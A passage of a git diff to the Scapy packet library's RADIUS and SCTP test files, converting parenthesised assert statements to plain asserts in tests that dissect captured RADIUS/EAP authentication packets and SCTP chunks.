b'\x01\xae\x01\x17>k\xd4\xc4\x19V\x0b*1\x99\xc8D\xea\xc2\x94Z\x01\x06leap\x06\x06\x00\x00\x00\x02\x1a\x1b\x00\x00\x00\t\x01\x15service-type=Framed\x0c\x06\x00\x00#\xee\x1e\x13AC-7E-8A-4E-E2-92\x1f\x1300-26-73-9E-0F-D3O\x0b\x02\x01\x00\t\x01leapP\x12U\xbc\x12\xcdM\x00\xf8\xdb4\xf1\x18r\xca_\x8c\xf6f\x02\x1a1\x00\x00\x00\t\x01+audit-session-id=0AC8090E0000001A0354CA00\x1a\x14\x00\x00\x00\t\x01\x0emethod=dot1x\x08\x06\xc0\xa8\n\xb9\x04\x06\xc0\xa8\n\x80\x1a\x1d\x00\x00\x00\t\x02\x17GigabitEthernet1/0/18W\x17GigabitEthernet1/0/18=\x06\x00\x00\x00\x0f\x05\x06\x00\x00\xc3\xc6' radius_packet = Radius(s) -assert(radius_packet.id == 174) -assert(radius_packet.len == 279) -assert(radius_packet.authenticator == b'>k\xd4\xc4\x19V\x0b*1\x99\xc8D\xea\xc2\x94Z') -assert(len(radius_packet.attributes) == 17) -assert(radius_packet.attributes[0].type == 1) -assert(type(radius_packet.attributes[0]) == RadiusAttr_User_Name) -assert(radius_packet.attributes[0].len == 6) -assert(radius_packet.attributes[0].value == b"leap") -assert(radius_packet.attributes[1].type == 6) -assert(type(radius_packet.attributes[1]) == RadiusAttr_Service_Type) -assert(radius_packet.attributes[1].len == 6) -assert(radius_packet.attributes[1].value == 2) -assert(radius_packet.attributes[2].type == 26) -assert(type(radius_packet.attributes[2]) == RadiusAttr_Vendor_Specific) -assert(radius_packet.attributes[2].len == 27) -assert(radius_packet.attributes[2].vendor_id == 9) -assert(radius_packet.attributes[2].vendor_type == 1) -assert(radius_packet.attributes[2].vendor_len == 21) -assert(radius_packet.attributes[2].value == b"service-type=Framed") -assert(radius_packet.attributes[6].type == 79) -assert(type(radius_packet.attributes[6]) == RadiusAttr_EAP_Message) -assert(radius_packet.attributes[6].len == 11) -assert(radius_packet.attributes[6].value.haslayer(EAP)) -assert(radius_packet.attributes[6].value[EAP].code == 2) -assert(radius_packet.attributes[6].value[EAP].id == 1) -assert(radius_packet.attributes[6].value[EAP].len == 9) -assert(radius_packet.attributes[6].value[EAP].type == 1) -assert(hasattr(radius_packet.attributes[6].value[EAP], "identity")) -assert(radius_packet.attributes[6].value[EAP].identity == b"leap") -assert(radius_packet.attributes[7].type == 80) -assert(type(radius_packet.attributes[7]) == RadiusAttr_Message_Authenticator) -assert(radius_packet.attributes[7].len == 18) -assert(radius_packet.attributes[7].value == b'U\xbc\x12\xcdM\x00\xf8\xdb4\xf1\x18r\xca_\x8c\xf6') -assert(radius_packet.attributes[11].type == 8) -assert(type(radius_packet.attributes[11]) == RadiusAttr_Framed_IP_Address) -assert(radius_packet.attributes[11].len == 6) -assert(radius_packet.attributes[11].value == '192.168.10.185') -assert(radius_packet.attributes[16].type == 5) -assert(type(radius_packet.attributes[16]) == RadiusAttr_NAS_Port) -assert(radius_packet.attributes[16].len == 6) -assert(radius_packet.attributes[16].value == 50118) +assert radius_packet.id == 174 +assert radius_packet.len == 279 +assert radius_packet.authenticator == b'>k\xd4\xc4\x19V\x0b*1\x99\xc8D\xea\xc2\x94Z' +assert len(radius_packet.attributes) == 17 +assert radius_packet.attributes[0].type == 1 +assert type(radius_packet.attributes[0]) == RadiusAttr_User_Name +assert radius_packet.attributes[0].len == 6 +assert radius_packet.attributes[0].value == b"leap" +assert radius_packet.attributes[1].type == 6 +assert type(radius_packet.attributes[1]) == RadiusAttr_Service_Type +assert radius_packet.attributes[1].len == 6 +assert radius_packet.attributes[1].value == 2 +assert radius_packet.attributes[2].type == 26 +assert type(radius_packet.attributes[2]) == RadiusAttr_Vendor_Specific +assert radius_packet.attributes[2].len == 27 +assert radius_packet.attributes[2].vendor_id == 9 +assert radius_packet.attributes[2].vendor_type == 1 +assert radius_packet.attributes[2].vendor_len == 21 +assert radius_packet.attributes[2].value == b"service-type=Framed" +assert radius_packet.attributes[6].type == 79 +assert type(radius_packet.attributes[6]) == RadiusAttr_EAP_Message +assert radius_packet.attributes[6].len == 11 +assert radius_packet.attributes[6].value.haslayer(EAP) +assert radius_packet.attributes[6].value[EAP].code == 2 +assert radius_packet.attributes[6].value[EAP].id == 1 +assert radius_packet.attributes[6].value[EAP].len == 9 +assert radius_packet.attributes[6].value[EAP].type == 1 +assert hasattr(radius_packet.attributes[6].value[EAP], "identity") +assert radius_packet.attributes[6].value[EAP].identity == b"leap" +assert radius_packet.attributes[7].type == 80 +assert type(radius_packet.attributes[7]) == RadiusAttr_Message_Authenticator +assert radius_packet.attributes[7].len == 18 +assert radius_packet.attributes[7].value == b'U\xbc\x12\xcdM\x00\xf8\xdb4\xf1\x18r\xca_\x8c\xf6' +assert radius_packet.attributes[11].type == 8 +assert type(radius_packet.attributes[11]) == RadiusAttr_Framed_IP_Address +assert radius_packet.attributes[11].len == 6 +assert radius_packet.attributes[11].value == '192.168.10.185' +assert radius_packet.attributes[16].type == 5 +assert type(radius_packet.attributes[16]) == RadiusAttr_NAS_Port +assert radius_packet.attributes[16].len == 6 +assert radius_packet.attributes[16].value == 50118 f,v = radius_packet.getfield_and_val("authenticator") assert f.i2repr(None, v) == '3e6bd4c419560b2a3199c844eac2945a' @@ -68,102 +68,102 @@ assert ram.compute_message_authenticator(radius_packet, b"dummy bytes", b"scapy" = RADIUS - Access-Challenge - Dissection (2) s = b'\x0b\xae\x00[\xc7\xae\xfc6\xa1=\xb5\x99&^\xdf=\xe9\x00\xa6\xe8\x12\rHello, leapO\x16\x01\x02\x00\x14\x11\x01\x00\x08\xb8\xc4\x1a4\x97x\xd3\x82leapP\x12\xd3\x12\x17\xa6\x0c.\x94\x85\x03]t\xd1\xdb\xd0\x13\x8c\x18\x12iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO' radius_packet = Radius(s) -assert(radius_packet.id == 174) -assert(radius_packet.len == 91) -assert(radius_packet.authenticator == b'\xc7\xae\xfc6\xa1=\xb5\x99&^\xdf=\xe9\x00\xa6\xe8') -assert(len(radius_packet.attributes) == 4) -assert(radius_packet.attributes[0].type == 18) -assert(type(radius_packet.attributes[0]) == RadiusAttribute) -assert(radius_packet.attributes[0].len == 13) -assert(radius_packet.attributes[0].value == b"Hello, leap") -assert(radius_packet.attributes[1].type == 79) -assert(type(radius_packet.attributes[1]) == RadiusAttr_EAP_Message) -assert(radius_packet.attributes[1].len == 22) -assert(radius_packet.attributes[1][EAP].code == 1) -assert(radius_packet.attributes[1][EAP].id == 2) -assert(radius_packet.attributes[1][EAP].len == 20) -assert(radius_packet.attributes[1][EAP].type == 17) -assert(radius_packet.attributes[2].type == 80) -assert(type(radius_packet.attributes[2]) == RadiusAttr_Message_Authenticator) -assert(radius_packet.attributes[2].len == 18) -assert(radius_packet.attributes[2].value == b'\xd3\x12\x17\xa6\x0c.\x94\x85\x03]t\xd1\xdb\xd0\x13\x8c') -assert(radius_packet.attributes[3].type == 24) -assert(type(radius_packet.attributes[3]) == RadiusAttr_State) -assert(radius_packet.attributes[3].len == 18) -assert(radius_packet.attributes[3].value == b'iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO') +assert radius_packet.id == 174 +assert radius_packet.len == 91 +assert radius_packet.authenticator == b'\xc7\xae\xfc6\xa1=\xb5\x99&^\xdf=\xe9\x00\xa6\xe8' +assert len(radius_packet.attributes) == 4 +assert radius_packet.attributes[0].type == 18 +assert type(radius_packet.attributes[0]) == RadiusAttribute +assert radius_packet.attributes[0].len == 13 +assert radius_packet.attributes[0].value == b"Hello, leap" +assert radius_packet.attributes[1].type == 79 +assert type(radius_packet.attributes[1]) == RadiusAttr_EAP_Message +assert radius_packet.attributes[1].len == 22 +assert radius_packet.attributes[1][EAP].code == 1 +assert radius_packet.attributes[1][EAP].id == 2 +assert radius_packet.attributes[1][EAP].len == 20 +assert radius_packet.attributes[1][EAP].type == 17 +assert radius_packet.attributes[2].type == 80 +assert type(radius_packet.attributes[2]) == RadiusAttr_Message_Authenticator +assert radius_packet.attributes[2].len == 18 +assert radius_packet.attributes[2].value == b'\xd3\x12\x17\xa6\x0c.\x94\x85\x03]t\xd1\xdb\xd0\x13\x8c' +assert radius_packet.attributes[3].type == 24 +assert type(radius_packet.attributes[3]) == RadiusAttr_State +assert radius_packet.attributes[3].len == 18 +assert radius_packet.attributes[3].value == b'iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO' = RADIUS - Access-Request - Dissection (3) s = b'\x01\xaf\x01DC\xbe!J\x08\xdf\xcf\x9f\x00v~,\xfb\x8e`\xc8\x01\x06leap\x06\x06\x00\x00\x00\x02\x1a\x1b\x00\x00\x00\t\x01\x15service-type=Framed\x0c\x06\x00\x00#\xee\x1e\x13AC-7E-8A-4E-E2-92\x1f\x1300-26-73-9E-0F-D3O&\x02\x02\x00$\x11\x01\x00\x18\rE\xc9\x92\xf6\x9ae\x04\xa2\x06\x13\x8f\x0b#\xf1\xc56\x8eU\xd9\x89\xe5\xa1)leapP\x12|\x1c\x9d[dv\x9c\x19\x96\xc6\xec\xb82\x8f\n f\x02\x1a1\x00\x00\x00\t\x01+audit-session-id=0AC8090E0000001A0354CA00\x1a\x14\x00\x00\x00\t\x01\x0emethod=dot1x\x08\x06\xc0\xa8\n\xb9\x04\x06\xc0\xa8\n\x80\x1a\x1d\x00\x00\x00\t\x02\x17GigabitEthernet1/0/18W\x17GigabitEthernet1/0/18=\x06\x00\x00\x00\x0f\x05\x06\x00\x00\xc3\xc6\x18\x12iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO' radius_packet = Radius(s) -assert(radius_packet.id == 175) -assert(radius_packet.len == 324) -assert(radius_packet.authenticator == b'C\xbe!J\x08\xdf\xcf\x9f\x00v~,\xfb\x8e`\xc8') -assert(len(radius_packet.attributes) == 18) -assert(radius_packet.attributes[0].type == 1) -assert(type(radius_packet.attributes[0]) == RadiusAttr_User_Name) -assert(radius_packet.attributes[0].len == 6) -assert(radius_packet.attributes[0].value == b"leap") -assert(radius_packet.attributes[1].type == 6) -assert(type(radius_packet.attributes[1]) == RadiusAttr_Service_Type) -assert(radius_packet.attributes[1].len == 6) -assert(radius_packet.attributes[1].value == 2) -assert(radius_packet.attributes[2].type == 26) -assert(type(radius_packet.attributes[2]) == RadiusAttr_Vendor_Specific) -assert(radius_packet.attributes[2].len == 27) -assert(radius_packet.attributes[2].vendor_id == 9) -assert(radius_packet.attributes[2].vendor_type == 1) -assert(radius_packet.attributes[2].vendor_len == 21) -assert(radius_packet.attributes[2].value == b"service-type=Framed") -assert(radius_packet.attributes[6].type == 79) -assert(type(radius_packet.attributes[6]) == RadiusAttr_EAP_Message) -assert(radius_packet.attributes[6].len == 38) -assert(radius_packet.attributes[6].value.haslayer(EAP)) -assert(radius_packet.attributes[6].value[EAP].code == 2) -assert(radius_packet.attributes[6].value[EAP].id == 2) -assert(radius_packet.attributes[6].value[EAP].len == 36) -assert(radius_packet.attributes[6].value[EAP].type == 17) -assert(radius_packet.attributes[7].type == 80) -assert(type(radius_packet.attributes[7]) == RadiusAttr_Message_Authenticator) -assert(radius_packet.attributes[7].len == 18) -assert(radius_packet.attributes[7].value == b'|\x1c\x9d[dv\x9c\x19\x96\xc6\xec\xb82\x8f\n ') -assert(radius_packet.attributes[11].type == 8) -assert(type(radius_packet.attributes[11]) == RadiusAttr_Framed_IP_Address) -assert(radius_packet.attributes[11].len == 6) -assert(radius_packet.attributes[11].value == '192.168.10.185') -assert(radius_packet.attributes[16].type == 5) -assert(type(radius_packet.attributes[16]) == RadiusAttr_NAS_Port) -assert(radius_packet.attributes[16].len == 6) -assert(radius_packet.attributes[16].value == 50118) -assert(radius_packet.attributes[17].type == 24) -assert(type(radius_packet.attributes[17]) == RadiusAttr_State) -assert(radius_packet.attributes[17].len == 18) -assert(radius_packet.attributes[17].value == b'iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO') +assert radius_packet.id == 175 +assert radius_packet.len == 324 +assert radius_packet.authenticator == b'C\xbe!J\x08\xdf\xcf\x9f\x00v~,\xfb\x8e`\xc8' +assert len(radius_packet.attributes) == 18 +assert radius_packet.attributes[0].type == 1 +assert type(radius_packet.attributes[0]) == RadiusAttr_User_Name +assert radius_packet.attributes[0].len == 6 +assert radius_packet.attributes[0].value == b"leap" +assert radius_packet.attributes[1].type == 6 +assert type(radius_packet.attributes[1]) == RadiusAttr_Service_Type +assert radius_packet.attributes[1].len == 6 +assert radius_packet.attributes[1].value == 2 +assert radius_packet.attributes[2].type == 26 +assert type(radius_packet.attributes[2]) == RadiusAttr_Vendor_Specific +assert radius_packet.attributes[2].len == 27 +assert radius_packet.attributes[2].vendor_id == 9 +assert radius_packet.attributes[2].vendor_type == 1 +assert radius_packet.attributes[2].vendor_len == 21 +assert radius_packet.attributes[2].value == b"service-type=Framed" +assert radius_packet.attributes[6].type == 79 +assert type(radius_packet.attributes[6]) == RadiusAttr_EAP_Message +assert radius_packet.attributes[6].len == 38 +assert radius_packet.attributes[6].value.haslayer(EAP) +assert radius_packet.attributes[6].value[EAP].code == 2 +assert radius_packet.attributes[6].value[EAP].id == 2 +assert radius_packet.attributes[6].value[EAP].len == 36 +assert radius_packet.attributes[6].value[EAP].type == 17 +assert radius_packet.attributes[7].type == 80 +assert type(radius_packet.attributes[7]) == RadiusAttr_Message_Authenticator +assert radius_packet.attributes[7].len == 18 +assert radius_packet.attributes[7].value == b'|\x1c\x9d[dv\x9c\x19\x96\xc6\xec\xb82\x8f\n ' +assert radius_packet.attributes[11].type == 8 +assert type(radius_packet.attributes[11]) == RadiusAttr_Framed_IP_Address +assert radius_packet.attributes[11].len == 6 +assert radius_packet.attributes[11].value == '192.168.10.185' +assert radius_packet.attributes[16].type == 5 +assert type(radius_packet.attributes[16]) == RadiusAttr_NAS_Port +assert radius_packet.attributes[16].len == 6 +assert radius_packet.attributes[16].value == 50118 +assert radius_packet.attributes[17].type == 24 +assert type(radius_packet.attributes[17]) == RadiusAttr_State +assert radius_packet.attributes[17].len == 18 +assert radius_packet.attributes[17].value == b'iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO' = RADIUS - Access-Challenge - Dissection (4) s = b'\x0b\xaf\x00K\x82 \x95=\xfd\x80\x05 -l}\xab)\xa5kU\x12\rHello, leapO\x06\x03\x03\x00\x04P\x12l0\xb9\x8d\xca\xfc!\xf3\xa7\x08\x80\xe1\xf6}\x84\xff\x18\x12iQs\xf7hRb@k\x9d,\xa0\x99\x8ehO' radius_packet = Radius(s) -assert(radius_packet.id == 175) -assert(radius_packet.len == 75) -assert(radius_packet.authenticator == b'\x82 \x95=\xfd\x80\x05 -l}\xab)\xa5kU') -assert(len(radius_packet.attributes) == 4) -assert(radius_packet.attributes[0].type == 18) -assert(type(radius_packet.attributes[0]) == RadiusAttribute) -assert(radius_packet.attributes[0].len == 13) -assert(radius_packet.attributes[0].value == b"Hello, leap") -assert(radius_packet.attributes[1].type == 79) -assert(type(radius_packet.attributes[1]) == RadiusAttr_EAP_Message) -assert(radius_packet.attributes[1].len == 6) -assert(radius_packet.attributes[1][EAP].code == 3) -assert(radius_packet.attributes[1][EAP].id == 3) -assert(radius_packet.attributes[1][EAP].len == 4) -assert(radius_packet.attributes[2].type == 80) -assert(type(radius_packet.attributes[2]) == RadiusAttr_Message_Authenticator) -assert(radius_packet.attributes[2].len == 18) -assert(radius_packet.attributes[2].value == b'l0\xb9\x8d\xca\xfc!\xf3\xa7\x08\x80\xe1\xf6}\x84\xff') -assert(radius_packet.attributes[3].type == 24) -assert(type(radius_packet.attributes[3]) == RadiusAttr_State) -assert(radius_packet.attributes[3].len == 18) -assert(radius_packet.attributes[3].value == b'iQs\xf7hRb@k\x9d,\xa0\x99\x8ehO') +assert radius_packet.id == 175 +assert radius_packet.len == 75 +assert radius_packet.authenticator == b'\x82 \x95=\xfd\x80\x05 -l}\xab)\xa5kU' +assert len(radius_packet.attributes) == 4 +assert radius_packet.attributes[0].type == 18 +assert type(radius_packet.attributes[0]) == RadiusAttribute +assert radius_packet.attributes[0].len == 13 +assert radius_packet.attributes[0].value == b"Hello, leap" +assert radius_packet.attributes[1].type == 79 +assert type(radius_packet.attributes[1]) == RadiusAttr_EAP_Message +assert radius_packet.attributes[1].len == 6 +assert radius_packet.attributes[1][EAP].code == 3 +assert radius_packet.attributes[1][EAP].id == 3 +assert radius_packet.attributes[1][EAP].len == 4 +assert radius_packet.attributes[2].type == 80 +assert type(radius_packet.attributes[2]) == RadiusAttr_Message_Authenticator +assert radius_packet.attributes[2].len == 18 +assert radius_packet.attributes[2].value == b'l0\xb9\x8d\xca\xfc!\xf3\xa7\x08\x80\xe1\xf6}\x84\xff' +assert radius_packet.attributes[3].type == 24 +assert type(radius_packet.attributes[3]) == RadiusAttr_State +assert radius_packet.attributes[3].len == 18 +assert radius_packet.attributes[3].value == b'iQs\xf7hRb@k\x9d,\xa0\x99\x8ehO' = RADIUS - Response Authenticator computation s = b'\x01\xae\x01\x17>k\xd4\xc4\x19V\x0b*1\x99\xc8D\xea\xc2\x94Z\x01\x06leap\x06\x06\x00\x00\x00\x02\x1a\x1b\x00\x00\x00\t\x01\x15service-type=Framed\x0c\x06\x00\x00#\xee\x1e\x13AC-7E-8A-4E-E2-92\x1f\x1300-26-73-9E-0F-D3O\x0b\x02\x01\x00\t\x01leapP\x12U\xbc\x12\xcdM\x00\xf8\xdb4\xf1\x18r\xca_\x8c\xf6f\x02\x1a1\x00\x00\x00\t\x01+audit-session-id=0AC8090E0000001A0354CA00\x1a\x14\x00\x00\x00\t\x01\x0emethod=dot1x\x08\x06\xc0\xa8\n\xb9\x04\x06\xc0\xa8\n\x80\x1a\x1d\x00\x00\x00\t\x02\x17GigabitEthernet1/0/18W\x17GigabitEthernet1/0/18=\x06\x00\x00\x00\x0f\x05\x06\x00\x00\xc3\xc6' @@ -174,11 +174,11 @@ access_challenge.compute_authenticator(access_request.authenticator, b"radiuskey = RADIUS - Layers (1) radius_attr = RadiusAttr_EAP_Message(value = EAP()) -assert(RadiusAttr_EAP_Message in radius_attr) -assert(RadiusAttribute in radius_attr) +assert RadiusAttr_EAP_Message in radius_attr +assert RadiusAttribute in radius_attr type(radius_attr[RadiusAttribute]) -assert(type(radius_attr[RadiusAttribute]) == RadiusAttr_EAP_Message) -assert(EAP in radius_attr.value) +assert type(radius_attr[RadiusAttribute]) == RadiusAttr_EAP_Message +assert EAP in radius_attr.value = RADIUS - sessions (1) p = IP()/TCP(sport=1812)/Radius(authenticator="scapy")/RadiusAttribute(value="scapy") diff --git a/test/scapy/layers/sctp.uts b/test/scapy/layers/sctp.uts index 2a63b98432f..676009dfd73 100644 --- a/test/scapy/layers/sctp.uts +++ b/test/scapy/layers/sctp.uts @@ -30,237 +30,237 @@ SCTPChunkSACK in p and p[SCTP].chksum == 0x3b01d404 and p[SCTPChunkSACK].gap_ack ~ sctp blob = b"\x1A\x85\x26\x94\x00\x00\x00\x0D\x00\x00\x04\xD2" p = SCTP(blob) -assert(p.dport == 9876) -assert(p.sport == 6789) -assert(p.tag == 13) -assert(p.chksum == 1234) +assert p.dport == 9876 +assert p.sport == 6789 +assert p.tag == 13 +assert p.chksum == 1234 = basic SCTPChunkData - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x61\x74\x61" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkData)) -assert(p.reserved == 0) -assert(p.delay_sack == 0) -assert(p.unordered == 0) -assert(p.beginning == 0) -assert(p.ending == 0) -assert(p.tsn == 0) -assert(p.stream_id == 0) -assert(p.stream_seq == 0) -assert(p.len == (len("data") + 16)) -assert(p.data == b"data") +assert isinstance(p, SCTPChunkData) +assert p.reserved == 0 +assert p.delay_sack == 0 +assert p.unordered == 0 +assert p.beginning == 0 +assert p.ending == 0 +assert p.tsn == 0 +assert p.stream_id == 0 +assert p.stream_seq == 0 +assert p.len == (len("data") + 16) +assert p.data == b"data" = basic SCTPChunkInit - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkInit)) -assert(p.flags == 0) -assert(p.len == 20) -assert(p.init_tag == 0) -assert(p.a_rwnd == 0) -assert(p.n_out_streams == 0) -assert(p.n_in_streams == 0) -assert(p.init_tsn == 0) -assert(p.params == []) +assert isinstance(p, SCTPChunkInit) +assert p.flags == 0 +assert p.len == 20 +assert p.init_tag == 0 +assert p.a_rwnd == 0 +assert p.n_out_streams == 0 +assert p.n_in_streams == 0 +assert p.init_tsn == 0 +assert p.params == [] = SCTPChunkInit multiple valid parameters - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x5C\x00\x00\x00\x65\x00\x00\x00\x66\x00\x67\x00\x68\x00\x00\x00\x69\x00\x0C\x00\x06\x00\x05\x00\x00\x80\x00\x00\x04\xC0\x00\x00\x04\x80\x08\x00\x07\x0F\xC1\x80\x00\x80\x03\x00\x04\x80\x02\x00\x24\x87\x77\x21\x29\x3F\xDA\x62\x0C\x06\x6F\x10\xA5\x39\x58\x60\x98\x4C\xD4\x59\xD8\x8A\x00\x85\xFB\x9E\x2E\x66\xBA\x3A\x23\x54\xEF\x80\x04\x00\x06\x00\x01\x00\x00" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkInit)) -assert(p.flags == 0) -assert(p.len == 92) -assert(p.init_tag == 101) -assert(p.a_rwnd == 102) -assert(p.n_out_streams == 103) -assert(p.n_in_streams == 104) -assert(p.init_tsn == 105) -assert(len(p.params) == 7) +assert isinstance(p, SCTPChunkInit) +assert p.flags == 0 +assert p.len == 92 +assert p.init_tag == 101 +assert p.a_rwnd == 102 +assert p.n_out_streams == 103 +assert p.n_in_streams == 104 +assert p.init_tsn == 105 +assert len(p.params) == 7 params = {type(param): param for param in p.params} -assert(set(params.keys()) == {SCTPChunkParamECNCapable, SCTPChunkParamFwdTSN, +assert (set(params.keys()) == {SCTPChunkParamECNCapable, SCTPChunkParamFwdTSN, SCTPChunkParamSupportedExtensions, SCTPChunkParamChunkList, SCTPChunkParamRandom, SCTPChunkParamRequestedHMACFunctions, SCTPChunkParamSupportedAddrTypes}) -assert(params[SCTPChunkParamECNCapable] == SCTPChunkParamECNCapable()) -assert(params[SCTPChunkParamFwdTSN] == SCTPChunkParamFwdTSN()) -assert(params[SCTPChunkParamSupportedExtensions] == SCTPChunkParamSupportedExtensions(len=7)) -assert(params[SCTPChunkParamChunkList] == SCTPChunkParamChunkList(len=4)) -assert(params[SCTPChunkParamRandom].len == 4+32) -assert(len(params[SCTPChunkParamRandom].random) == 32) -assert(params[SCTPChunkParamRequestedHMACFunctions] == SCTPChunkParamRequestedHMACFunctions(len=6)) -assert(params[SCTPChunkParamSupportedAddrTypes] == SCTPChunkParamSupportedAddrTypes(len=6)) +assert params[SCTPChunkParamECNCapable] == SCTPChunkParamECNCapable() +assert params[SCTPChunkParamFwdTSN] == SCTPChunkParamFwdTSN() +assert params[SCTPChunkParamSupportedExtensions] == SCTPChunkParamSupportedExtensions(len=7) +assert params[SCTPChunkParamChunkList] == SCTPChunkParamChunkList(len=4) +assert params[SCTPChunkParamRandom].len == 4+32 +assert len(params[SCTPChunkParamRandom].random) == 32 +assert params[SCTPChunkParamRequestedHMACFunctions] == SCTPChunkParamRequestedHMACFunctions(len=6) +assert params[SCTPChunkParamSupportedAddrTypes] == SCTPChunkParamSupportedAddrTypes(len=6) = basic SCTPChunkInitAck - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkInitAck)) -assert(p.flags == 0) -assert(p.len == 20) -assert(p.init_tag == 0) -assert(p.a_rwnd == 0) -assert(p.n_out_streams == 0) -assert(p.n_in_streams == 0) -assert(p.init_tsn == 0) -assert(p.params == []) +assert isinstance(p, SCTPChunkInitAck) +assert p.flags == 0 +assert p.len == 20 +assert p.init_tag == 0 +assert p.a_rwnd == 0 +assert p.n_out_streams == 0 +assert p.n_in_streams == 0 +assert p.init_tsn == 0 +assert p.params == [] = SCTPChunkInitAck with state cookie - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x4C\x00\x00\x00\x65\x00\x00\x00\x66\x00\x67\x00\x68\x00\x00\x00\x69\x80\x00\x00\x04\x00\x0B\x00\x0D\x6C\x6F\x63\x61\x6C\x68\x6F\x73\x74\x00\x00\x00\xC0\x00\x00\x04\x80\x08\x00\x07\x0F\xC1\x80\x00\x00\x07\x00\x14\x00\x10\x9E\xB2\x86\xCE\xE1\x7D\x0F\x6A\xAD\xFD\xB3\x5D\xBC\x00" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkInitAck)) -assert(p.flags == 0) -assert(p.len == 76) -assert(p.init_tag == 101) -assert(p.a_rwnd == 102) -assert(p.n_out_streams == 103) -assert(p.n_in_streams == 104) -assert(p.init_tsn == 105) -assert(len(p.params) == 5) +assert isinstance(p, SCTPChunkInitAck) +assert p.flags == 0 +assert p.len == 76 +assert p.init_tag == 101 +assert p.a_rwnd == 102 +assert p.n_out_streams == 103 +assert p.n_in_streams == 104 +assert p.init_tsn == 105 +assert len(p.params) == 5 params = {type(param): param for param in p.params} -assert(set(params.keys()) == {SCTPChunkParamECNCapable, SCTPChunkParamHostname, +assert (set(params.keys()) == {SCTPChunkParamECNCapable, SCTPChunkParamHostname, SCTPChunkParamFwdTSN, SCTPChunkParamSupportedExtensions, SCTPChunkParamStateCookie}) -assert(params[SCTPChunkParamECNCapable] == SCTPChunkParamECNCapable()) -assert(raw(params[SCTPChunkParamHostname]) == raw(SCTPChunkParamHostname(len=13, hostname="localhost"))) -assert(params[SCTPChunkParamFwdTSN] == SCTPChunkParamFwdTSN()) -assert(params[SCTPChunkParamSupportedExtensions] == SCTPChunkParamSupportedExtensions(len=7)) -assert(params[SCTPChunkParamStateCookie].len == 4+16) -assert(len(params[SCTPChunkParamStateCookie].cookie) == 16) +assert params[SCTPChunkParamECNCapable] == SCTPChunkParamECNCapable() +assert raw(params[SCTPChunkParamHostname]) == raw(SCTPChunkParamHostname(len=13, hostname="localhost")) +assert params[SCTPChunkParamFwdTSN] == SCTPChunkParamFwdTSN() +assert params[SCTPChunkParamSupportedExtensions] == SCTPChunkParamSupportedExtensions(len=7) +assert params[SCTPChunkParamStateCookie].len == 4+16 +assert len(params[SCTPChunkParamStateCookie].cookie) == 16 = basic SCTPChunkSACK - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkSACK)) -assert(p.flags == 0) -assert(p.len == 16) -assert(p.cumul_tsn_ack == 0) -assert(p.a_rwnd == 0) -assert(p.n_gap_ack == 0) -assert(p.n_dup_tsn == 0) -assert(p.gap_ack_list == []) -assert(p.dup_tsn_list == []) +assert isinstance(p, SCTPChunkSACK) +assert p.flags == 0 +assert p.len == 16 +assert p.cumul_tsn_ack == 0 +assert p.a_rwnd == 0 +assert p.n_gap_ack == 0 +assert p.n_dup_tsn == 0 +assert p.gap_ack_list == [] +assert p.dup_tsn_list == [] = basic SCTPChunkHeartbeatReq - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x04" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkHeartbeatReq)) -assert(p.flags == 0) -assert(p.len == 4) -assert(p.params == []) +assert isinstance(p, SCTPChunkHeartbeatReq) +assert p.flags == 0 +assert p.len == 4 +assert p.params == [] = basic SCTPChunkHeartbeatAck - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x04" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkHeartbeatAck)) -assert(p.flags == 0) -assert(p.len == 4) -assert(p.params == []) +assert isinstance(p, SCTPChunkHeartbeatAck) +assert p.flags == 0 +assert p.len == 4 +assert p.params == [] = basic SCTPChunkAbort - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x04" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkAbort)) -assert(p.reserved == 0) -assert(p.TCB == 0) -assert(p.len == 4) -assert(p.error_causes == b"") +assert isinstance(p, SCTPChunkAbort) +assert p.reserved == 0 +assert p.TCB == 0 +assert p.len == 4 +assert p.error_causes == b"" = basic SCTPChunkShutDown - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x08\x00\x00\x00\x00" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkShutdown)) -assert(p.flags == 0) -assert(p.len == 8) -assert(p.cumul_tsn_ack == 0) +assert isinstance(p, SCTPChunkShutdown) +assert p.flags == 0 +assert p.len == 8 +assert p.cumul_tsn_ack == 0 = basic SCTPChunkShutDownAck - Dissection ~ 